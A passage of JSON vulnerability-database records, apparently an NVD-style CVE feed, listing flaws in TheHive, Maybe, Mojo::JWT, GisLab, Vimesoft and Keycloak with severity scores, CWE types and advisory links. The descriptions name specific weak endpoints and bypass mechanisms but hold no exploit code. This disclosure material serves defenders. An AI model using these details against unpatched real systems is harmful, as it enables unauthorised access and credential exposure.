07-17T16:17:16.947","lastModified":"2026-07-17T18:28:53.707","vulnStatus":"Awaiting Analysis","cveTags":[{"sourceIdentifier":"disclosure@vulncheck.com","tags":["unsupported-when-assigned"]}],"descriptions":[{"lang":"en","value":"TheHive through 4.1.24 contains an unauthenticated information disclosure vulnerability that allows unauthenticated attackers to retrieve sensitive configuration data by sending a GET request to the /api/status endpoint, which lacks authentication enforcement in the StatusCtrl.scala handler. Attackers can obtain the datastore attachment protection password, configured authentication providers, SSO settings, MFA capabilities, and clustered node addresses and roles without any credentials."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"TheHive-Project","product":"TheHive","defaultStatus":"affected","repo":"https://github.com/TheHive-Project/TheHive","packageURL":"pkg:github/TheHive-Project/TheHive","versions":[{"version":"0","lessThanOrEqual":"4.1.24","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:26:45.147021Z","id":"CVE-2026-63098","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-306"}]}],"references":[{"url":"https://github.com/geo-chen/oss/blob/main/TheHive.md#finding-1-get-apistatus-exposes-attachment-protection-password-without-authentication","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/thehive-unauthenticated-information-disclosure-via-api-status-endpoint","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63099","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T16:17:17.107","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[{"sourceIdentifier":"disclosure@vulncheck.com","tags":["unsupported-when-assigned"]}],"descriptions":[{"lang":"en","value":"TheHive through 4.1.24 contains a broken object-level authorization vulnerability in the attachment download endpoints that allows any authenticated user to access attachments belonging to other organizations by supplying a content-hash identifier. Attackers can exploit the missing organization-scoped authorization check in AttachmentSrv.visible, which is implemented as a pass-through traversal, to download arbitrary attachments."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"TheHive-Project","product":"TheHive","defaultStatus":"affected","repo":"https://github.com/TheHive-Project/TheHive","packageURL":"pkg:github/TheHive-Project/TheHive","versions":[{"version":"0","lessThanOrEqual":"4.1.24","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:34:34.981453Z","id":"CVE-2026-63099","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/geo-chen/oss/blob/main/TheHive.md#finding-2-cross-organisation-attachment-disclosure-via-unauthorized-datastore-endpoint-missing-object-level-authorization","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/thehive-broken-object-level-authorization-via-attachment-download-endpoints","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63100","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T16:17:17.263","lastModified":"2026-07-17T18:28:39.220","vulnStatus":"Deferred","cveTags":[{"sourceIdentifier":"disclosure@vulncheck.com","tags":["unsupported-when-assigned"]}],"descriptions":[{"lang":"en","value":"Maybe through 0.6.0 contains a missing authorization vulnerability that allows authenticated low-privilege member-role users to access and modify global hosting settings by exploiting unprotected show and update actions in the Settings::HostingsController, where the before_action ensure_admin filter is applied only to the clear_cache action. Attackers can read the operator's Synth API key rendered in plaintext via a form field value attribute, overwrite it with an attacker-controlled value, toggle public registration settings, and disable email confirmation requirements to disrupt the entire instance."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"maybe-finance","product":"maybe","defaultStatus":"affected","repo":"https://github.com/maybe-finance/maybe","packageURL":"pkg:github/maybe-finance/maybe","versions":[{"version":"0","lessThanOrEqual":"0.6.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/geo-chen/oss/blob/main/maybe.md","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/maybe-missing-authorization-via-hostingscontroller-show-update","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-9537","sourceIdentifier":"9b29abf9-4ab0-4765-b253-1875cd9b441e","published":"2026-07-17T16:17:20.417","lastModified":"2026-07-17T18:17:17.603","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Mojo::JWT versions before 1.02 for Perl verify HMAC signatures with a non-constant-time string comparison.\n\nThe decode() method compares the supplied signature to the recomputed HMAC with Perl's eq operator, which stops at the first differing byte, so the comparison time varies with the number of matching leading bytes.\n\nA caller that decodes attacker supplied tokens leaks the expected signature through this timing variation, which can be aggregated over many requests to recover the signature and forge a token."}],"affected":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","affectedData":[{"vendor":"JBERGER","product":"Mojo::JWT","defaultStatus":"unaffected","collectionURL":"https://cpan.org/modules","packageName":"Mojo-JWT","programFiles":["lib/Mojo/JWT.pm"],"programRoutines":[{"name":"Mojo::JWT::decode"}],"repo":"http://github.com/jberger/Mojo-JWT","versions":[{"version":"0","lessThan":"1.02","versionType":"custom","status":"affected"}]}]}],"metrics":{},"weaknesses":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","type":"Secondary","description":[{"lang":"en","value":"CWE-208"}]}],"references":[{"url":"https://github.com/jberger/Mojo-JWT/commit/b8aefb846613e44b5b12bc170898ffd5b05094a2.patch","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"http://www.openwall.com/lists/oss-security/2026/07/17/11","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-11763","sourceIdentifier":"iletisim@usom.gov.tr","published":"2026-07-17T17:17:13.047","lastModified":"2026-07-17T17:54:18.640","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Authorization bypass through User-Controlled key vulnerability in Gis Informatics Engineering Consulting Laboratory R&D and Software Services Inc. GisLab Laboratory Management System allows Exploitation of Trusted Identifiers.\n\nThis issue affects GisLab Laboratory Management System: from 1.4.03 through 08072026."}],"affected":[{"source":"iletisim@usom.gov.tr","affectedData":[{"vendor":"Gis Informatics Engineering Consulting Laboratory R&D and Software Services Inc.","product":"GisLab Laboratory Management System","defaultStatus":"unaffected","versions":[{"version":"1.4.03","lessThanOrEqual":"08072026","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:39:31.818762Z","id":"CVE-2026-11763","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0573","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2026-12691","sourceIdentifier":"iletisim@usom.gov.tr","published":"2026-07-17T17:17:13.177","lastModified":"2026-07-17T17:54:18.640","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Missing authentication for critical function vulnerability in Vimesoft Inc. Enterprise Video Platform allows Authentication Bypass.\n\nThis issue affects Enterprise Video Platform: from 3.11.0.0 before 3.25.0."}],"affected":[{"source":"iletisim@usom.gov.tr","affectedData":[{"vendor":"Vimesoft Inc.","product":"Enterprise Video Platform","defaultStatus":"unaffected","versions":[{"version":"3.11.0.0","lessThan":"3.25.0","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:50:17.088456Z","id":"CVE-2026-12691","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Primary","description":[{"lang":"en","value":"CWE-306"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0574","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2026-12692","sourceIdentifier":"iletisim@usom.gov.tr","published":"2026-07-17T17:17:13.303","lastModified":"2026-07-17T17:54:18.640","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Unverified password change vulnerability in Vimesoft Inc. Enterprise Video Platform allows Authentication Bypass.\n\nThis issue affects Enterprise Video Platform: from 3.11.0.0 before 3.25.0."}],"affected":[{"source":"iletisim@usom.gov.tr","affectedData":[{"vendor":"Vimesoft Inc.","product":"Enterprise Video Platform","defaultStatus":"unaffected","versions":[{"version":"3.11.0.0","lessThan":"3.25.0","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:51:06.397632Z","id":"CVE-2026-12692","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Primary","description":[{"lang":"en","value":"CWE-620"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0574","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2026-12693","sourceIdentifier":"iletisim@usom.gov.tr","published":"2026-07-17T17:17:13.430","lastModified":"2026-07-17T18:17:13.847","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Authorization bypass through User-Controlled key vulnerability in Vimesoft Inc. Enterprise Video Platform allows Accessing Functionality Not Properly Constrained by ACLs.\n\nThis issue affects Enterprise Video Platform: from 3.11.0.0 before 3.25.0."}],"affected":[{"source":"iletisim@usom.gov.tr","affectedData":[{"vendor":"Vimesoft Inc.","product":"Enterprise Video Platform","defaultStatus":"unaffected","versions":[{"version":"3.11.0.0","lessThan":"3.25.0","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L","baseScore":9.4,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":5.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:55:19.466388Z","id":"CVE-2026-12693","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0574","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2026-12694","sourceIdentifier":"iletisim@usom.gov.tr","published":"2026-07-17T17:17:13.547","lastModified":"2026-07-17T18:17:14.037","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Missing Authorization vulnerability in Vimesoft Inc. Enterprise Video Platform allows Accessing Functionality Not Properly Constrained by ACLs.\n\nThis issue affects Enterprise Video Platform: from 3.11.0.0 before 3.25.0."}],"affected":[{"source":"iletisim@usom.gov.tr","affectedData":[{"vendor":"Vimesoft Inc.","product":"Enterprise Video Platform","defaultStatus":"unaffected","versions":[{"version":"3.11.0.0","lessThan":"3.25.0","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:54:51.502360Z","id":"CVE-2026-12694","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0574","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2026-16093","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T17:17:14.133","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Keycloak provides a mechanism called Client Policies to enforce security requirements on clients, such as requiring them to use signed JWTs for authentication. A flaw was discovered where this enforcement can be bypassed. An attacker with valid client credentials can provide a fake, unsigned assertion header that tricks the system into thinking the policy requirements have been met. This allows the attacker to authenticate using simpler methods like a client secret even when the administrator has mandated more secure, signed assertions."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"affected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 7","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"secalert@redhat.com","type":"Primary","description":[{"lang":"en","value":"CWE-807"}]}],"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-16093","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501729","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-16103","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T17:17:14.263","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in the keycloak-services component of Keycloak. This issue is an incomplete fix for CVE-2026-9798, where brute-force protection checks were added to the Client-Initiated Backchannel Authentication (CIBA) initiation handler but were omitted from the token redemption handler. This allows an attacker with valid client credentials to obtain access and refresh tokens for a user account that has been locked due to brute-force protection, provided the authentication request was started before the lockout occurred and was approved by the user."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 7","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:01:59.231875Z","id":"CVE-2026-16103","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-16103","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501736","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-16104","sourceIdentifier":"secalert@redhat.com","published":"2026-07-17T17:17:14.393","lastModified":"2026-07-17T18:17:14.863","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in the authentication configuration endpoint of the keycloak-services component, which is the core engine for Red Hat Build of Keycloak identity and access management. The issue occurs because the system fails to mask sensitive configuration values, such as reCAPTCHA secret keys, when they are requested by administrators with view-only permissions. This can lead to the exposure of third-party service credentials to unauthorized personnel or through administrative logs."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"unaffected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 